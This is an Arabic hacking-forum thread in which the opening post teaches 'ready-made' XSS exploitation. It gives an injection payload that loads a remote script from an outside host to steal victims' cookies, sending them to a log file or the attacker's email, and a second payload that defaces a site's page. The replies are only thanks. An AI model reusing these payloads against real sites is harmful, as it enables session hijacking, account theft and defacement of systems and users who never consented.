1. Egy HacKerS

    Egy HacKerS DeveloPer Plus

    الأنتساب:
    ‏1 ديسمبر 2012
    المشاركات:
    113
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الوظيفة:
    HacKer
    الإقامة:
    Egy
    [​IMG]
    بسم الله الرحمن الرحيم

    احبتي الأعزاء السلام عليكم ورحمة الله وبركاته

    تقبل الله صيامكم وقيامكم صومآ مقبولآ وافطارآ شهيآ

    أسأل الله ان يتقبل منا ومنكم وان يجمعنا بكم في الفردوس الاعلى

    [​IMG]

    درسنا لهذا اليوم بتكلم عن بعض الإستغلالات الجاهزة لثغرات xss

    الإستغلال الأول : Log File For Get Cookies (لجلب الكوكيز)

    تحقن هذا الكود في الحقل المصاب : '

    [CODEE]"--><sc ript src=http://site.tld/cookies/xss.js></sc ript>[/CODEE]

    إمسح الفراغات

    يجب رفع ملفي xss.js & info_mail.php في مجلد cookies

    والنتائج ستظهر في ملف log.html

    [​IMG]

    أو يمكنك وضع إيميلك وستصلك رسالة بكوكيز الضحية


    ملاحظة الرجاء تعديل ملف info_mail.php لان الايميل الافتراضي هو [email protected]

    اذا لم تعدل عليه ستذهب جميع معلومات السحب على الايميل

    الإستغلال الثاني : change index

    تحقن هذا الكود في الحقل المصاب : '

    [CODEE]"--><sc ript src=http://site.tld/index/c_index.js></sc ript>[/CODEE]

    سيتم وضع الإندكس على كامل الصفحة + تغير title الصفحة + صورة في الإندكس

    يمكن تغير لينك الصورة من داخل الملف : c_index.js

    [​IMG]

    [​IMG]
     

    الملفات المرفقة:

    آخر تعديل بواسطة المشرف: ‏25 يونيو 2015
  2. Wolf Hex

    Wolf Hex DeveloPer Plus

    الأنتساب:
    ‏24 فبراير 2015
    المشاركات:
    264
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الوظيفة:
    Student
    الإقامة:
    دولة أمير المؤمنين (ع)
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    وعليكم السلام ورحمه الله
    ثغرة جميله واستغلال اجمل
    يعطيك العافيه على مجهودك
    لاتحرمنا جديدك
    {1!$7}
     
  3. J3eny

    J3eny Developer

    الأنتساب:
    ‏8 يوليو 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    المدينه المنوره
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مبدع من يومك يابطل :ُye@:
     
  4. Resident Evil

    Resident Evil Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    46
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    my home
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مشكووور اخوي.... وفقك الله
     
  5. SMART-AL-Falahi

    SMART-AL-Falahi Developer

    الأنتساب:
    ‏14 فبراير 2015
    المشاركات:
    156
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    Oman
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    وعليكم السلام ورحمه اللهمشكور اخي الغال ي طريقه قديم لكنه فعاله

     
  6. سنوكـــر

    سنوكـــر Developer

    الأنتساب:
    ‏18 يوليو 2012
    المشاركات:
    22
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    الإقامة:
    السعوديه - الباحه
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    :{7}: مشكووووووور أخي :{7}:​
     
  7. before

    before Developer

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    17
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    3
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    شكرا اخي على الامثلة
     
  8. غاوي هكر

    غاوي هكر DeveloPer Plus

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    215
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    فلسطين
    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مشكووور يا عسل بوركت
     

مشاركة هذه الصفحة